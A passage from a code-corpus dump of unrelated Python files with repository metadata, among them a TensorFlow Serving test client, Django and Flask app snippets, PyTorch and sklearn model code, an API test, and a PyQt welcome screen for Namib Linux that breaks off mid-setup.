"line_number": 10,
"usage_type": "name"
},
{
"api_name": "discogs_client.Client",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "discogs_client.exceptions.ConfigurationError",
"line_number": 17,
"usage... |
4496359468 | import requests
import numpy as np
import cv2
import sys, os, shutil
import json
sys.path.append("../")
from PIL import Image
# input_img = r"E:\data\starin-diode\diode-0605\images\20200605_5.jpg"
# input_img = "diode.jpg"
input_imgs = r"E:\data\diode-opt\imgs/"
# input_imgs = r"E:\pycharm_project\Data-proessing\break-group-yolo\test01\result/"
files = os.listdir(input_imgs)
save_path = r"out_imgs"
if os.path.exists(save_path):
shutil.rmtree(save_path)
os.makedirs(save_path)
for file in files:
# input_img = r"E:\data\diode-opt\imgs\20200611_84.jpg"
input_img = input_imgs + file
img = Image.open(input_img)
print(np.array(img))
img1 = img.resize((416, 416))
# img1 = img.resize((224, 224))
image_np = np.array(img1)
print(image_np.shape)
image_np = image_np.transpose([2,0,1])
print(image_np.shape)
# print(image_np[np.newaxis,:].shape)
img_data = image_np[np.newaxis, :].tolist()
print(image_np[np.newaxis,:].shape)
data = {"instances": img_data}
# data = {"inputs": img_data}
# data = {"data": img_data}
# http://172.20.112.102:8701/v1/models/model-fish/metadata
preds1 = requests.post("http://172.20.112.102:9101/v1/models/model-diode:predict", json=data)
# preds1 = requests.post("http://172.20.112.102:4000/predictions/resnet34", json=data)
print(preds1.json())
predictions1 = json.loads(preds1.content.decode('utf-8'))
print(predictions1)
exit()
preds = requests.post("http://172.20.112.102:9101/v1/models/model-diode:predict", json=data)
print(preds)
predictions = json.loads(preds.content.decode('utf-8'))["predictions"][0]
print(predictions)
print(np.array(predictions)[:,4].max())
pred = np.array(predictions)
print(pred.shape)
# exit()
a = pred[:, 4] > 0.25
print(pred[a])
print(len(pred[a]))
# exit()
im = cv2.imread(input_img)
# print(im.shape) # hwc
h_s = im.shape[0] / 416
w_s = im.shape[1] / 416
box = []
for i in range(len(pred[a])):
# print(pred[a][i])
x1 = pred[a][i][0]
y1 = pred[a][i][1]
x2 = pred[a][i][2]
y2 = pred[a][i][3]
xx1 = (x1 - x2 / 2)
yy1 = (y1 - y2 / 2)
xx2 = (x1 + x2 / 2)
yy2 = (y1 + y2 / 2)
box.append([xx1, yy1, xx2, yy2, pred[a][i][4], pred[a][i][5:]])
cv2.rectangle(im, (int(xx1 * w_s), int(yy1 * h_s)), (int(xx2 * w_s), int(yy2 * h_s)), (255, 0, 0))
# print(box)
# cv2.imshow('ss1', im)
cv2.imwrite(save_path + '/' + file, im)
# cv2.waitKey(0)
# filtered_boxes = np.array([[6.64219894e+01,3.38672394e+02,1.29818487e+01,1.43017712e+01]])
# draw_boxes(filtered_boxes, img, "classes", (416, 416), True)
# img.show()
# im = cv2.imread(input_img)
# # print(im.shape) # hwc
# x_ = im.shape[0]/416
# y_ = im.shape[1]/416
# # a = min(x_,y_)
# # p = 0.5*(im.shape[:2] - a*np.array([416,416]))
# # s = (np.array([66,338])-p)/a
# # print(s)
# # s1 = (np.array([12,14])-p)/a
# # print(s1)
# # w,h,cx,cy
# img = cv2.resize(im,(416,416))
# # cv2.rectangle(img,(79,182),(9,15),(0,0,255))
# # cv2.rectangle(img,(int((79-9/2)),int((182-15/2))),(int((79+9/2)),int((182+15/2))),(0,0,255))
# # cv2.rectangle(im,(int((338/2-12)*y_),int((66/2-14)*x_)),(int((12+338/2)*y_),int((14+66/2)*x_)),(0,0,255))
# h_s = im.shape[0]/416
# w_s = im.shape[1]/416
# x1 = 79
# y1 = 182
# x2 = 9
# y2 = 15
# xx1 = (x1 - x2/2)
# yy1 = (y1 - y2/2)
# xx2 = (x1 + x2/2)
# yy2 = (y1 + y2/2)
# cv2.rectangle(img,(xx1,yy1),(xx2,yy2),(0,0,255))
# cv2.rectangle(im,(int(xx1*w_s),int(yy1*h_s)),(int(xx2*w_s),int(yy2*h_s)),(255,0,0))
# x1,y1,x2,y2 x1- x2/2 y1- y2/2 x1+x2/2 y1 + y2/2
# cv2.imshow("ss",img)
# cv2.imshow('ss1',im)
# cv2.waitKey(0)
| Chase2816/TF-TORCH | tf1.15v3/tfserving-test1.py | tfserving-test1.py | py | 3,851 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_num... |
35939556874 | '''
Created on Nov 28, 2012
@author: cosmin
'''
from google.appengine.ext import webapp
import logging
import jinja2
import os
from models import Trend
from models import TopJobs
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
class SplitTrend:
def __init__(self, job, values):
self.job = job
logging.info(values)
self.values = [int(val) for val in values]
class Trends(webapp.RequestHandler):
def get(self):
'''
The class serving the page for the trends.
'''
months = ["2012-11", "2012-10", "2012-09", "2012-08", "2012-07",
"2012-06", "2012-05", "2012-04", "2012-03", "2012-02", "2012-01",
"2011-12", "2011-11", "2011-10", "2011-09", "2011-08", "2011-07",
"2011-06", "2011-05", "2011-04", "2011-03", "2011-02", "2011-01",
"2010-12", "2010-11", "2010-10", "2010-09", "2010-08", "2010-07",
"2010-06", "2010-05", "2010-04", "2010-03", "2010-02", "2010-01",
"2009-12", "2009-11", "2009-10", "2009-09", "2009-08", "2009-07",
"2009-06", "2009-05", "2009-04", "2009-03", "2009-02", "2009-01",
"2008-12", "2008-11", "2008-10", "2008-09", "2008-08", "2008-07",
"2008-06", "2008-05", "2008-04", "2008-03", "2008-02", "2008-01"]
months.reverse()
#Get jobs for trends
jobs = self.request.get_all("job")
jobs = [j for j in jobs if len(j) > 0]
logging.info("Trends for jobs: " + ','.join(jobs))
#Also get the total counts for months
jobs.append('total')
#Get the trends from the database
split_trends = []
if len(jobs) > 1:
trends = Trend.all()
trends.filter("job IN", jobs)
for t in trends:
nt = SplitTrend(t.job, t.monthly_count.split(';'))
if nt.job == 'total':
total = nt
logging.info("Total - " + str(t))
else:
split_trends.append(nt)
logging.info(t)
trends_names = [t.job for t in split_trends]
#Compute percentages
for t in split_trends:
t.values = [val * 100.0 / total.values[idx] for idx, val in enumerate(t.values)]
#Generate the page
template_values = { 'jobs': TopJobs, 'trends': split_trends, 'trends_names': trends_names, 'count': len(split_trends), 'months': months}
template = jinja_environment.get_template('templates/trends.html')
self.response.out.write(template.render(template_values))
| cosminstefanxp/freely-stats | remote-code/Trends.py | Trends.py | py | 2,653 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "jinja2.Environment",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "jinja2.FileSystemLoader",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
... |
29653268879 | from django.contrib import admin as dj_admin
from django.contrib import admin
from myapp.models import Project, ModelGroup, AutodeskExtractorRule, BimModel, Job
from myapp.models import URN, ActiveLink
class WorkAdmin(dj_admin.ModelAdmin):
list_display = ("id", "name")
class ProjectAdmin(admin.ModelAdmin):
list_display = (
"name",
"description",
"created_at",
"updated_at",
"created_by",
"updated_by",
"deleted_at",
"deleted_by",
)
class ModelGroupAdmin(admin.ModelAdmin):
list_display = (
"name",
"description",
"created_at",
"updated_at",
"created_by",
"updated_by",
"deleted_at",
"deleted_by",
)
class AutodeskExtractorRuleAdmin(admin.ModelAdmin):
list_display = (
"project",
"model_group",
"name",
"description",
"created_at",
"updated_at",
"created_by",
"updated_by",
"deleted_at",
"deleted_by",
)
class BimModelAdmin(admin.ModelAdmin):
list_display = (
"project",
"model_group",
"name",
"description",
"created_at",
"updated_at",
"created_by",
"updated_by",
"deleted_at",
"deleted_by",
)
class JobAdmin(admin.ModelAdmin):
list_display = (
"project",
"task_type",
"created_at",
"task_id",
)
admin.site.register(Project, ProjectAdmin)
admin.site.register(ModelGroup, ModelGroupAdmin)
admin.site.register(AutodeskExtractorRule, AutodeskExtractorRuleAdmin)
admin.site.register(BimModel, BimModelAdmin)
admin.site.register(Job, JobAdmin)
dj_admin.site.register(ActiveLink)
dj_admin.site.register(URN)
| kishik/ADCM-Scheduler | myapp/admin.py | admin.py | py | 1,783 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "django.contrib.admin.ModelAdmin",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "django.contrib.admin",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.contrib.admin.ModelAdmin",
"line_number": 11,
"usage_type": "attribute"
... |
32068966886 | from flask import Flask, request, jsonify
from tf_idf import get_text, scrape_google, tf_idf_analysis
app = Flask(__name__)
@app.route('/get_text')
def get_text_endpoint():
url = request.args.get('url')
text = get_text(url)
return jsonify(text=text)
@app.route('/scrape_google')
def scrape_google_endpoint():
query = request.args.get('query')
links = scrape_google(query)
return jsonify(links=links)
@app.route('/tf_idf_analysis')
def tf_idf_analysis_endpoint():
keyword = request.args.get('keyword')
result = tf_idf_analysis(keyword)
return jsonify(result=result)
if __name__ == '__main__':
app.run(debug=True)
| farahramzy/seopro | python/app.py | app.py | py | 657 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask.request.args.get",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "flask.request.args",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "flask.request... |
16158666088 | import json
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, r2_score
import joblib
import sys
def train_model():
jsondata = json.loads(sys.argv[1])
# Create a dictionary to store models for each variable
models = {}
for variable_data in jsondata:
variable_name = variable_data['dataName']
df = pd.DataFrame(variable_data['dataSource'])
df['timeStamp'] = pd.to_datetime(df['timeStamp'])
df['hour'] = df['timeStamp'].dt.hour
df['minute'] = df['timeStamp'].dt.minute
df['second'] = df['timeStamp'].dt.second
target = 'dataValue'
X = df[['hour', 'minute', 'second']]
y = df[target]
model = LinearRegression()
model.fit(X, y)
models[variable_name] = model
joblib.dump(model, f'trained_model_{variable_name}.joblib')
response_data = {"models": models, "status": "trained"}
try:
print(json.dumps(response_data))
except Exception as e:
print(f"An error occurred: {e}")
train_model()
| MadakariNayakaHM/FinalYearProject | pythonScripts/new2.py | new2.py | py | 1,106 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "json.loads",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "pandas.to_datetime",
"lin... |
9356643217 | import random
import tensorflow as tf
from AI.agent import Agent
from AI.ROSEnvironment import ArmControlPlateform
from config import get_config
flags = tf.app.flags
# Model
flags.DEFINE_string('model', 'DQN', 'Type of model')
# Environment
#flags.DEFINE_string('env_name', 'Acrobot-v1', 'The name of gym environment to use')
# Etc
#flags.DEFINE_boolean('display', True, 'Whether to do display the game screen or not')
flags.DEFINE_integer('random_seed', 123, 'Value of random seed')
FLAGS = flags.FLAGS
# Set random seed
tf.set_random_seed(FLAGS.random_seed)
random.seed(FLAGS.random_seed)
def main(_):
config = get_config(FLAGS) or FLAGS
env = ArmControlPlateform(config)
for _ in range(1):
env.reset()
agent = Agent(config, env)
agent.activate(learn=True)
def test():
config = get_config(FLAGS) or FLAGS
env = ArmControlPlateform(config)
env.reset()
for i in range(30):
sleep(0.1)
action = env.action_space.sample()
ob,re,ter = env.step(action)
print(ob,re,ter)
if __name__ == '__main__':
tf.app.run()
#test() | wlwlw/VisualArm | ArmRLAIController.py | ArmRLAIController.py | py | 1,111 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "tensorflow.app",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.set_random_seed",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "random.seed",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "config.get_... |
40402312512 | from tests.baseTest import *
from lib.random_generator import RandomGenerator
from lib.api_requests import RequestManager
from grappa import should
from api_endpoints.signup_endpoint import SignupMethods
from api_endpoints.threads_endpoint import ThreadsMethods
from lib.data_encoder import Encoder
class ViewThreadsTest(BaseTest):
rand = RandomGenerator()
rm = RequestManager()
encoder = Encoder()
@classmethod
def setUpClass(cls):
BaseTest.setUpClass()
account_data = SignupMethods().create_test_account(generate_fields=True)[0]
data_to_encode = account_data['username'] + ':' + account_data['password']
encoded_credentials = cls.encoder.encode_data(data_to_encode)
cls.thread_auth_headers = {'Authorization': 'Basic ' + encoded_credentials}
sample_thread = cls.rand.generate_random_string(10)
ThreadsMethods().create_sample_thread(authorization=cls.thread_auth_headers, thread_name=sample_thread,
private=False)
def setUp(self):
BaseTest.setUp(self)
self.threads_url = self.CONFIG['API_ADDRESS'] + '/threads'
def test_01_get_last_threads(self):
logging.info('Trying to get last threads')
result = ThreadsMethods().get_threads(authorization=self.thread_auth_headers)
logging.info('Server responded with %s' % result)
result['code'] | should.be.equal.to(200)
result['response']['itemsFound'] | should.be.a(int)
result['response']['limit'] | should.be.a(int)
result['response']['limit'] | should.be.equal.to(100)
len(result['response']['items']) | should.be.higher.than(0)
len(result['response']['items']) | should.be.lower.than(101)
result['response']['items'][0]['createdAt'] | should.be.a(int)
result['response']['items'][0]['updatedAt'] | should.be.a(int)
result['response']['items'][0]['id'] | should.be.a(str)
result['response']['items'][0]['id'] | should.not_be.none
result['response']['items'][0]['modelType'] | should.be.equal.to('ThreadModel')
result['response']['items'][0]['name'] | should.be.a(str)
result['response']['items'][0]['owner'] | should.be.a(str)
result['response']['items'][0]['users'] | should.be.a(list)
result['response']['items'][0]['private'] | should.be.a(bool)
result['response']['items'][0]['deleted'] | should.be.a(bool)
def test_02_get_last_100_threads(self):
logging.info('Generating 100 threads')
for i in range(0, 102):
sample_thread = self.rand.generate_random_string(10)
ThreadsMethods().create_sample_thread(authorization=self.thread_auth_headers, thread_name=sample_thread,
private=False)
logging.info('Trying to get last 100 threads')
result = ThreadsMethods().get_threads(authorization=self.thread_auth_headers)
logging.info('Server responded with %s' % result)
result['code'] | should.be.equal.to(200)
len(result['response']['items']) | should.be.equal.to(100)
| mdomosla/zadanie2-testy-forum | tests/threads/viewThreads_test.py | viewThreads_test.py | py | 3,144 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "lib.random_generator.RandomGenerator",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "lib.api_requests.RequestManager",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "lib.data_encoder.Encoder",
"line_number": 13,
"usage_type": "call"
... |
24639708926 | from typing import List, Tuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import Tensor, nn
def get_cnn_output_dim(
input_size: int, conv_kernel_size: int, padding_size: int, conv_stride_size: int
) -> int:
return (input_size + 2 * padding_size - conv_kernel_size) / conv_stride_size + 1
def get_pool_output_dim(
input_size, pool_kernel_size: int, pool_stride_size: int
) -> int:
return np.floor((input_size - pool_kernel_size) / pool_stride_size + 1)
def get_cnn_layer_output_dim(
n_layers: int,
input_size: int,
conv_kernel_size: int,
padding_size: int = 0,
conv_stride_size: int = 1,
pool_kernel_size: int = 2,
pool_stride_size: int = 2,
) -> int:
if n_layers > 1:
cnn_output = get_cnn_output_dim(
input_size, conv_kernel_size, padding_size, conv_stride_size
)
pool_output = get_pool_output_dim(
cnn_output, pool_kernel_size, pool_stride_size
)
n_layers -= 1
return int(
get_cnn_layer_output_dim(
n_layers,
pool_output,
conv_kernel_size,
padding_size,
conv_stride_size,
pool_kernel_size,
pool_stride_size,
)
)
else:
cnn_output = get_cnn_output_dim(
input_size, conv_kernel_size, padding_size, conv_stride_size
)
pool_output = get_pool_output_dim(
cnn_output, pool_kernel_size, pool_stride_size
)
return int(pool_output)
class MultivariateMLP(nn.Module):
def __init__(
self,
input_dimension: Tuple,
in_channels: int,
n_outputs: int,
):
super().__init__()
self.in_channels = in_channels
self.encoder = nn.Sequential(
FlattenMLP(),
nn.Linear(input_dimension[0] * input_dimension[1] * 1 * in_channels, 564),
# nn.BatchNorm1d(256),
nn.ReLU(),
nn.Dropout(0.5),
)
self.linear_classifiers = [
nn.Linear(564, n_outputs) for _ in range(in_channels)
]
def forward(self, x):
out = self.encoder(x)
outputs = [
F.softmax(classifier(out), dim=-1) for classifier in self.linear_classifiers
]
return outputs
class Flatten(nn.Module):
"""A custom layer that views an input as 1D."""
def forward(self, input):
return input.view(input.size(0), -1)
class FlattenMLP(nn.Module):
"""A custom layer that views an input as 1D."""
def forward(self, input):
return input.reshape(-1)
class MultivariateCNN(nn.Module):
"""https://github.com/ArminBaz/UTK-Face/blob/master/src/MultNN.py"""
def __init__(
self,
input_dimension: Tuple,
in_channels: int,
n_outputs: int,
n_cnn_layers: int = 2,
conv_kernel_size: int = 2,
pool_kernel_size: int = 2,
conv_channels_1: int = 256,
conv_channels_2: int = 512,
linear_hidden_cells: int = 256,
linear_dropout: float = 0.5,
):
super(MultivariateCNN, self).__init__()
self.in_channels = in_channels
linear_dim1 = get_cnn_layer_output_dim(
n_layers=n_cnn_layers,
input_size=input_dimension[0],
conv_kernel_size=conv_kernel_size,
pool_kernel_size=pool_kernel_size,
)
linear_dim2 = get_cnn_layer_output_dim(
n_layers=n_cnn_layers,
input_size=input_dimension[1],
conv_kernel_size=conv_kernel_size,
pool_kernel_size=pool_kernel_size,
)
self.encoder = nn.Sequential(
nn.Conv2d(
in_channels=in_channels,
out_channels=conv_channels_1,
kernel_size=conv_kernel_size,
),
nn.ReLU(),
nn.MaxPool2d(kernel_size=pool_kernel_size),
nn.Conv2d(
in_channels=conv_channels_1,
out_channels=conv_channels_2,
kernel_size=conv_kernel_size,
),
# nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d(kernel_size=pool_kernel_size),
# nn.Conv2d(in_channels, out_channels=8, kernel_size=conv_kernel_size),
# nn.ReLU(),
# nn.MaxPool2d(kernel_size=pool_kernel_size),
Flatten(),
nn.Linear(linear_dim1 * linear_dim2 * conv_channels_2, linear_hidden_cells),
# nn.BatchNorm1d(256),
nn.ReLU(),
nn.Dropout(linear_dropout),
)
self.linear_classifiers = [
nn.Linear(linear_hidden_cells, n_outputs) for _ in range(in_channels)
]
def forward(self, x):
out = self.encoder(x)
outputs = [
F.softmax(classifier(out), dim=-1) for classifier in self.linear_classifiers
]
return outputs
| aleksei-mashlakov/m6_competition | src/mv_cnn_model.py | mv_cnn_model.py | py | 5,039 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "numpy.floor",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "torch.nn.Module",
"line_number": 59,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 59,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"line_nu... |
8138880318 | from collections import Counter
class Solution:
def longestPalindrome(self, s: str) -> int:
counter = Counter(s)
ans = 0
odd = False
for k,v in counter.items():
ans += v // 2 * 2
if v % 2:
odd = True
if odd: ans += 1
return ans | MinecraftDawn/LeetCode | Easy/409. Longest Palindrome.py | 409. Longest Palindrome.py | py | 321 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "collections.Counter",
"line_number": 4,
"usage_type": "call"
}
] |
6583723969 | #!/usr/bin/python3
from PyQt5 import QtCore, QtGui, QtWidgets
import webbrowser
import os
import subprocess
class Ui_WelcomeScreen(object):
######################### CUSTOM ACTIONS ##########################
def forumButtonAction(self):
webbrowser.open("https://forum.namiblinux.org/categories")
def chatButtonAction(self):
webbrowser.open("https://www.namiblinux.org/support/chat/")
def donateButtonAction(self):
webbrowser.open("https://www.namiblinux.org/donate/")
def wikiButtonAction(self):
webbrowser.open("https://wiki.namiblinux.org/")
def newsButtonAction(self):
webbrowser.open("https://forum.namiblinux.org/c/announcements")
def helpButtonAction(self):
webbrowser.open("https://github.com/namiblinux")
def installButtonAction(self):
subprocess.Popen(["calamares_polkit"])
def startCheckAction(self):
if self.launchAtStartCheck.isChecked():
homedir = os.path.expanduser('~')
autostartfile = os.path.join(homedir, ".config/autostart/namib-welcome.desktop")
subprocess.Popen(["cp", "/usr/share/applications/namib-welcome.desktop", autostartfile])
else:
homedir = os.path.expanduser('~')
autostartfile = os.path.join(homedir, ".config/autostart/namib-welcome.desktop")
subprocess.Popen(["rm", autostartfile])
#####################################################################
def setupUi(self, WelcomeScreen):
WelcomeScreen.setObjectName("WelcomeScreen")
WelcomeScreen.resize(640, 480)
WelcomeScreen.setMinimumSize(640, 480)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/namib-welcome.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
WelcomeScreen.setWindowIcon(icon)
self.MainWidget = QtWidgets.QWidget(WelcomeScreen)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.MainWidget.sizePolicy().hasHeightForWidth())
self.MainWidget.setSizePolicy(sizePolicy)
self.MainWidget.setAutoFillBackground(False)
self.MainWidget.setObjectName("MainWidget")
self.gridLayout = QtWidgets.QGridLayout(self.MainWidget)
self.gridLayout.setObjectName("gridLayout")
self.mainGrid = QtWidgets.QGridLayout()
self.mainGrid.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)
self.mainGrid.setObjectName("mainGrid")
self.wikiButton = QtWidgets.QPushButton(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.wikiButton.sizePolicy().hasHeightForWidth())
self.wikiButton.setSizePolicy(sizePolicy)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/wiki.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.wikiButton.setIcon(icon1)
self.wikiButton.setObjectName("wikiButton")
######################### WIKI BUTTON ##########################
self.wikiButton.clicked.connect(self.wikiButtonAction)
################################################################
self.mainGrid.addWidget(self.wikiButton, 7, 0, 1, 1)
self.lineTop = QtWidgets.QFrame(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineTop.sizePolicy().hasHeightForWidth())
self.lineTop.setSizePolicy(sizePolicy)
self.lineTop.setFrameShape(QtWidgets.QFrame.HLine)
self.lineTop.setFrameShadow(QtWidgets.QFrame.Sunken)
self.lineTop.setObjectName("lineTop")
self.mainGrid.addWidget(self.lineTop, 4, 0, 1, 3)
self.logoLayout = QtWidgets.QHBoxLayout()
self.logoLayout.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)
self.logoLayout.setObjectName("logoLayout")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.logoLayout.addItem(spacerItem)
self.Logo = QtWidgets.QLabel(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Logo.sizePolicy().hasHeightForWidth())
self.Logo.setSizePolicy(sizePolicy)
self.Logo.setMaximumSize(QtCore.QSize(64, 64))
self.Logo.setText("")
self.Logo.setPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/logo.png"))
self.Logo.setScaledContents(True)
self.Logo.setWordWrap(False)
self.Logo.setObjectName("Logo")
self.logoLayout.addWidget(self.Logo)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.logoLayout.addItem(spacerItem1)
self.mainGrid.addLayout(self.logoLayout, 0, 0, 1, 3)
self.linksLabel = QtWidgets.QLabel(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.linksLabel.sizePolicy().hasHeightForWidth())
self.linksLabel.setSizePolicy(sizePolicy)
self.linksLabel.setScaledContents(True)
self.linksLabel.setWordWrap(True)
self.linksLabel.setObjectName("linksLabel")
self.mainGrid.addWidget(self.linksLabel, 5, 0, 1, 3)
self.donateButton = QtWidgets.QPushButton(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.donateButton.sizePolicy().hasHeightForWidth())
self.donateButton.setSizePolicy(sizePolicy)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/donate.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.donateButton.setIcon(icon2)
self.donateButton.setObjectName("donateButton")
######################### DONATE BUTTON ########################
self.donateButton.clicked.connect(self.donateButtonAction)
################################################################
self.mainGrid.addWidget(self.donateButton, 7, 2, 1, 1)
self.chatButton = QtWidgets.QPushButton(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.chatButton.sizePolicy().hasHeightForWidth())
self.chatButton.setSizePolicy(sizePolicy)
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/chat.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.chatButton.setIcon(icon3)
self.chatButton.setObjectName("chatButton")
######################### CHAT BUTTON ##########################
self.chatButton.clicked.connect(self.chatButtonAction)
###############################################################
self.mainGrid.addWidget(self.chatButton, 7, 1, 1, 1)
self.installationLabel = QtWidgets.QLabel(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.installationLabel.sizePolicy().hasHeightForWidth())
self.installationLabel.setSizePolicy(sizePolicy)
self.installationLabel.setObjectName("installationLabel")
######################### INSTALL LABEL ##########################
self.installationLabel.setVisible(False)
##################################################################
self.mainGrid.addWidget(self.installationLabel, 8, 1, 1, 1)
self.installButton = QtWidgets.QPushButton(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.installButton.sizePolicy().hasHeightForWidth())
self.installButton.setSizePolicy(sizePolicy)
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/install.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.installButton.setIcon(icon4)
self.installButton.setObjectName("installButton")
######################### INSTALL BUTTON ##########################
self.installButton.clicked.connect(self.installButtonAction)
self.installButton.setVisible(False)
###################################################################
self.mainGrid.addWidget(self.installButton, 9, 1, 1, 1)
self.welcomeLabel = QtWidgets.QLabel(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.welcomeLabel.sizePolicy().hasHeightForWidth())
self.welcomeLabel.setSizePolicy(sizePolicy)
self.welcomeLabel.setObjectName("welcomeLabel")
self.mainGrid.addWidget(self.welcomeLabel, 1, 0, 1, 3)
self.lineBottom = QtWidgets.QFrame(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineBottom.sizePolicy().hasHeightForWidth())
self.lineBottom.setSizePolicy(sizePolicy)
self.lineBottom.setFrameShape(QtWidgets.QFrame.HLine)
self.lineBottom.setFrameShadow(QtWidgets.QFrame.Sunken)
self.lineBottom.setObjectName("lineBottom")
self.mainGrid.addWidget(self.lineBottom, 10, 0, 1, 3)
self.forumsButton = QtWidgets.QPushButton(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.forumsButton.sizePolicy().hasHeightForWidth())
self.forumsButton.setSizePolicy(sizePolicy)
icon5 = QtGui.QIcon()
icon5.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/forums.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.forumsButton.setIcon(icon5)
self.forumsButton.setObjectName("forumsButton")
######################### FORUM BUTTON #########################
self.forumsButton.clicked.connect(self.forumButtonAction)
################################################################
self.mainGrid.addWidget(self.forumsButton, 6, 1, 1, 1)
